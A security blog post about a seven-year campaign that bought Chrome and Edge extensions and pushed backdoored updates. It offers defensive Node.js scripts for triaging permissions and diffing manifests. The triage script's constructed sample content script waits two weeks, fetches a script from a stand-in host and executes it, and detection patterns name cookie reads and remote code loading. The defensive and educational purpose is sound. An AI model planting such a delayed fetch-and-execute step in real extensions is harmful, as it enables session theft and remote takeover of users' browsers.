7-Year Malicious Campaign Installed Backdoor in Millions of Chrome and Edge Extensions
Hello HaWkers, an alarming discovery was revealed this week in the digital security world. Researchers identified a malicious campaign that operated for 7 years, compromising popular Chrome and Edge extensions with backdoors that potentially affected millions of users.
How many extensions do you have installed in your browser right now? And how many of them did you actually check before installing? This type of attack shows how even tools we consider safe can be threat vectors.
The Discovery
The campaign was recently exposed by security researchers who identified a recurring pattern of browser extension compromise. It had operated silently since 2018 without being caught by the stores' review processes or automated scanning.
How the Attack Worked
The scheme followed a well-structured pattern:
Phase 1: Acquisition
Attackers identified popular extensions whose original developers had lost interest or were willing to sell. Extensions with hundreds of thousands of users were preferred targets.
Phase 2: Malicious Update
After acquiring the extension, the new owner pushed an update containing obfuscated malicious code. Browsers install extension updates automatically, so the malicious version reached every existing user without any action on their part, carried by the trust the extension had already earned.
Phase 3: Persistence
The backdoor was designed to be extremely discreet, activating only under specific conditions to avoid detection by security tools and code analysis.
Phase 4: Exfiltration
Once active, the malware could:
- Steal session cookies
- Intercept credentials
- Inject fraudulent ads
- Redirect traffic
- Collect browsing data
Scale of the Problem
Alarming Numbers
The campaign compromised dozens of extensions, including some with:
- Over 1 million active installations
- Positive ratings of 4.5+ stars
- Years of "clean" history
Most affected categories:
| Category | Risk |
|---|---|
| Free VPNs | High |
| Download managers | High |
| Page modifiers | Medium |
| Productivity tools | Medium |
| Themes and customization | Low to Medium |
Why It Lasted So Long
Several factors allowed the campaign to operate for 7 years:
Sophisticated obfuscation
The malicious code was highly obfuscated and fragmented, making detection by static analysis difficult.
Conditional activation
The backdoor was only activated after an "incubation" period and only under certain geographic and usage conditions.
Distributed infrastructure
The command and control (C2) servers used domains that rotated frequently and blended with legitimate traffic.
Reputation purchase
By acquiring already established extensions, attackers inherited all the trust built by the original developer.
How to Check If You Were Affected
Step 1: Review Installed Extensions
In Chrome, go to chrome://extensions/ and in Edge, go to edge://extensions/. Turn on Developer mode on that page to see each extension's ID and the views it is currently running.
Check:
- Last update date for each extension
- If the developer changed recently
- Permissions requested by the extension
Step 2: Check for Excessive Permissions
Be suspicious of extensions that ask for:
- Read and modify all data on all sites
- Manage downloads
- Modify data sent to servers
- Access tabs and windows
If a themes extension asks for access to all your browsing data, something is wrong.
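To make Step 2, and the obfuscation and conditional-activation tricks described under "Why It Lasted So Long", concrete, here is an added example (not code from this article, and not code from any of the affected extensions) of a small Node.js script that triages an unpacked extension offline: it scores the manifest's permissions, flags a mismatch between what the extension claims to be and what it asks for, and greps the bundled scripts for indicators such as dynamic code execution, scripts fetched at runtime, and branches gated on elapsed time or locale. The permission weights, the regexes, and the sample "Dark Mode Theme Pro" manifest and content script are all constructed for illustration; they are heuristics, not the detection logic of any real scanner.

```javascript
// Added example (not from the article or any named extension): offline
// triage of an unpacked browser extension. Heuristics only; a hit is a
// reason to read the code, not proof that the extension is malicious.

// Permissions that let an extension read or alter most of what you do.
// Weights are this example's own, not a published scoring scheme.
const HIGH_RISK = new Map([
  ["<all_urls>", 5], ["*://*/*", 5], ["http://*/*", 4], ["https://*/*", 4],
  ["webRequestBlocking", 4], ["cookies", 4], ["nativeMessaging", 4], ["proxy", 4],
  ["webRequest", 3], ["declarativeNetRequest", 3], ["scripting", 3],
  ["management", 3], ["history", 3], ["tabs", 2], ["downloads", 2],
]);

// Source-level indicators of the patterns described in the article:
// obfuscated payloads, code loaded at runtime, activation gated on time or locale.
const INDICATORS = [
  { re: /\beval\s*\(|new\s+Function\s*\(/, why: "dynamic code execution" },
  { re: /\batob\s*\(\s*["'][A-Za-z0-9+/=]{40,}["']\s*\)/, why: "long base64 blob decoded at runtime" },
  { re: /(\\x[0-9a-f]{2}){8,}/i, why: "hex-escaped string literal (obfuscation)" },
  { re: /fetch\s*\(\s*["']https?:\/\/[^"']+\.js["']/, why: "remote script fetched at runtime" },
  { re: /createElement\s*\(\s*["']script["']\s*\)/, why: "script element injected into pages" },
  { re: /Date\.now\(\)\s*-\s*[\w.]+\s*>\s*\d{8,}/, why: "activation delayed by a long time window" },
  { re: /navigator\.language|resolvedOptions\(\)\.timeZone/, why: "locale or timezone check (geo-gating)" },
  { re: /document\.cookie|chrome\.cookies\.getAll/, why: "reads cookies" },
];

function scorePermissions(manifest) {
  // Collect every grant the manifest asks for, deduplicated. MV3 moves host
  // access into host_permissions, and content_scripts.matches is a grant too.
  const declared = new Set([
    ...(manifest.permissions || []),
    ...(manifest.host_permissions || []),
    ...(manifest.content_scripts || []).flatMap(cs => cs.matches || []),
  ]);
  const hits = [...declared].filter(p => HIGH_RISK.has(p));
  return { score: hits.reduce((s, p) => s + HIGH_RISK.get(p), 0), hits };
}

function scanSource(file, code) {
  return INDICATORS.filter(i => i.re.test(code)).map(i => ({ file, why: i.why }));
}

function triage(manifest, files) {
  const perms = scorePermissions(manifest);
  const findings = Object.entries(files).flatMap(([f, c]) => scanSource(f, c));
  // A theme that wants cookies and every site is the mismatch the article warns about.
  const claimsCosmetic = /theme|wallpaper|dark mode|font/i.test(`${manifest.name} ${manifest.description || ""}`);
  const mismatch = claimsCosmetic && perms.score >= 5;
  let verdict = "low";
  if (perms.score >= 8 || findings.length >= 2 || mismatch) verdict = "high";
  else if (perms.score >= 4 || findings.length === 1) verdict = "medium";
  return { verdict, permissionScore: perms.score, riskyPermissions: perms.hits, findings, mismatch };
}

// Constructed sample: a "theme" whose content script behaves like the campaign above.
const SAMPLE_MANIFEST = {
  manifest_version: 3,
  name: "Dark Mode Theme Pro",
  description: "A dark theme for your browser",
  version: "4.2.0",
  permissions: ["cookies", "webRequest", "tabs", "storage"],
  host_permissions: ["<all_urls>"],
  content_scripts: [{ matches: ["<all_urls>"], js: ["content.js"] }],
};
const SAMPLE_FILES = {
  "content.js": `
    // Waits two weeks after install and only fires for English-locale users,
    // then pulls and runs a script from a remote host (constructed sample).
    const installedAt = Number(localStorage.getItem("i")) || Date.now();
    if (Date.now() - installedAt > 1209600000 && navigator.language.startsWith("en")) {
      fetch("https://cdn.example.invalid/update.js").then(r => r.text()).then(t => new Function(t)());
    }
  `,
  "theme.js": "document.body.classList.add('dark');",
};

console.log(JSON.stringify(triage(SAMPLE_MANIFEST, SAMPLE_FILES), null, 2));
```

To run it against a real extension, read manifest.json and the .js files from the unpacked directory (with Developer mode on, chrome://extensions shows each extension's ID, and the files live under the profile's Extensions/<id>/ folder) and pass them to triage. A "high" verdict means read the code, not that the extension is malicious; legitimate ad blockers and password managers also score high on permissions alone.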
Step 3: Use Analysis Tools
There are tools that can help identify potentially malicious extensions:
CRXcavator (for Chrome)
Service that analyzes Chrome extensions and provides risk scores based on permissions and behavior.
Extension Police
Extension that monitors changes in other extensions and alerts about suspicious updates.
Step 4: Monitor Network Traffic
For more technical users, monitoring browser network traffic can reveal suspicious communications:
# Linux/macOS - list Chrome's open network connections (-P keeps port numbers numeric; use "msedge" for Edge)
lsof -i -n -P | grep -i chrome
# Windows PowerShell - connections owned by any chrome.exe process (-in, not -eq: Get-Process returns several PIDs; use "msedge" for Edge)
Get-NetTCPConnection | Where-Object { $_.OwningProcess -in (Get-Process chrome).Id } | Select-Object RemoteAddress, RemotePort, State, OwningProcess
Security Best Practices For Extensions
Before Installing
1. Verify the developer
Research who is behind the extension. Known developers and established companies are more reliable.
2. Analyze permissions
Only install extensions that ask for the minimum permissions necessary to function.
3. Check recent reviews
Old reviews may not reflect the current state of the extension. Focus on comments from recent months.
4. Prefer open source extensions
Open code allows the community to audit security.
After Installing
1. Keep few extensions
The fewer extensions, the smaller the attack surface.
2. Disable when not using
Extensions you rarely use can be disabled and activated only when needed.
3. Review periodically
Every few months, review your extensions and remove ones you no longer use.
Company Response
Google
Google removed the identified extensions from the Chrome Web Store and is working on improvements to review processes:
- More rigorous analysis of updates for extensions that change ownership
- Machine learning to detect suspicious behavior
- Monitoring of extension network communications
Microsoft
Microsoft also took similar actions on the Edge Add-ons store and is implementing:
- Additional checks for extensions that request sensitive permissions
- Better tracking of ownership changes
- Closer collaboration with security researchers
The Extension Ecosystem Needs to Change
Structural Problems
This incident exposes fundamental problems in the current extension distribution model:
Opaque ownership transfer
When an extension changes owners, users are not notified. This allows attackers to buy extensions and turn them into malware.
Automatic updates without review
Extensions can be automatically updated without security review proportional to the number of affected users.
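Extension Police, mentioned in Step 3, and the two gaps just described (silent ownership transfer, silent updates) share one user-side mitigation: keep a snapshot of each extension's manifest from install time and diff it after every update. The script below is an added example, not this article's code and not Extension Police itself. The two "Tab Saver" snapshots are constructed, and the author and homepage_url fields are treated as an ownership signal on the assumption that the developer filled them in; Chrome requires neither.

```javascript
// Added example (not from the article, and not Extension Police's code):
// diff an install-time snapshot of an extension's manifest against the
// current one to surface what an auto-update changed. Assumes the developer
// filled in `author` and `homepage_url`; Chrome requires neither.

// Constructed snapshots: what was on disk at install, and what is there now.
const INSTALL_SNAPSHOT = {
  name: "Tab Saver", version: "2.1.0", author: "Original Dev",
  homepage_url: "https://tabsaver.example.invalid",
  permissions: ["storage", "tabs"],
  host_permissions: [],
  content_scripts: [],
};

const CURRENT_SNAPSHOT = {
  name: "Tab Saver", version: "2.2.0", author: "NewCo Apps Ltd",
  homepage_url: "https://newco.example.invalid",
  permissions: ["storage", "tabs", "cookies", "webRequest"],
  host_permissions: ["<all_urls>"],
  content_scripts: [{ matches: ["<all_urls>"], js: ["inject.js"], run_at: "document_start" }],
};

// Set difference in both directions, preserving declaration order.
function setDiff(before, after) {
  const b = new Set(before), a = new Set(after);
  return { added: [...a].filter(x => !b.has(x)), removed: [...b].filter(x => !a.has(x)) };
}

// content_scripts.matches is a grant of page access, so it is diffed like a permission.
const matchesOf = m => (m.content_scripts || []).flatMap(cs => cs.matches || []);

function diffSnapshots(before, after) {
  const report = {
    version: `${before.version} -> ${after.version}`,
    ownershipChanged: false,
    changes: [],
    severity: "info",
  };

  // Identity fields: a change here is the ownership transfer the store never announces.
  for (const field of ["author", "homepage_url"]) {
    if ((before[field] || "") !== (after[field] || "")) {
      report.ownershipChanged = true;
      report.changes.push({ kind: "identity", field, from: before[field], to: after[field] });
    }
  }

  // Grants: anything newly added widens what the extension can reach.
  const grants = [
    ["permission", setDiff(before.permissions || [], after.permissions || [])],
    ["host", setDiff(before.host_permissions || [], after.host_permissions || [])],
    ["content_script_match", setDiff(matchesOf(before), matchesOf(after))],
  ];
  for (const [kind, d] of grants) {
    for (const g of d.added) report.changes.push({ kind, added: g });
    for (const g of d.removed) report.changes.push({ kind, removed: g });
  }

  // New owner plus wider access is exactly the acquisition-then-update pattern.
  const widened = report.changes.some(c => "added" in c);
  if (widened && report.ownershipChanged) report.severity = "high";
  else if (widened || report.ownershipChanged) report.severity = "medium";
  return report;
}

console.log(JSON.stringify(diffSnapshots(INSTALL_SNAPSHOT, CURRENT_SNAPSHOT), null, 2));
```

In practice the install-time snapshot is the manifest.json you copy out of the extension's folder under the browser profile the day you install it; rerun the diff whenever the version folder changes. Browsers already prompt when an update adds a permission that needs a new warning, but they do not prompt for a new author, a new homepage, or a new content-script target, which is the gap this check fills.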
Overly broad permissions
Host access is still coarse: an extension that declares access to all sites can read and change every page the user visits. Chrome does let a user restrict an installed extension to specific sites or to "on click", but the grant accepted at install time is the broad one, and most users never narrow it.
Proposed Solutions
Researchers and security experts suggest:
Manifest V3
The new version of Chrome's extension manifest already closes some of the dangerous paths (most relevant here, it forbids loading remotely hosted code, which is exactly how a reviewed "clean" extension can be turned malicious after install), but the transition is slow and controversial.
Ownership change notification
Users should be notified and have the option to review extensions that change developers.
More restrictive sandbox
Extensions should operate in more isolated environments, with granular access only to what they actually need.
Lessons For Developers
If you develop browser extensions, this incident offers important lessons:
Supply Chain Security
Protect your credentials
Developer accounts are valuable targets. Use multi-factor authentication and strong passwords.
Audit dependencies
Extensions that bundle third-party libraries inherit those libraries' bugs and their supply chain; pin versions, review what the bundler pulls in, and treat a library update with the same suspicion as an ownership change.
Monitor access
Watch for unauthorized access attempts to your developer account.
If You Decide to Sell
If you decide to sell or transfer an extension:
- Consider the impact on users
- Verify the buyer's reputation
- Be transparent with the community about the transfer
Conclusion
The 7-year backdoor campaign in extensions is a stark reminder that digital security requires constant vigilance. Even tools we use daily and consider safe can be compromised.
For users, the recommendation is clear: review your extensions, remove unnecessary ones, and be careful before installing new ones. For developers and technology companies, it is time to rethink how the extension ecosystem works.
If you want to learn more about security in web development, I recommend checking out the article Critical Vulnerability in React and Next.js Allows Remote Code Execution where we discuss another recent threat and how to protect yourself.
Let's go! 🦅
📚 Want to Deepen Your JavaScript Knowledge?
This article covered a critical security topic, but there is much more to learn about secure and modern development.
Developers who invest in solid, structured knowledge tend to have more opportunities in the market.
Complete Study Material
If you want to master JavaScript from basics to advanced, I have prepared a complete guide:
Investment options:
- 1x of $4.90 on card
- or $4.90 upfront
👉 Learn About JavaScript Guide
💡 Material updated with industry best practices

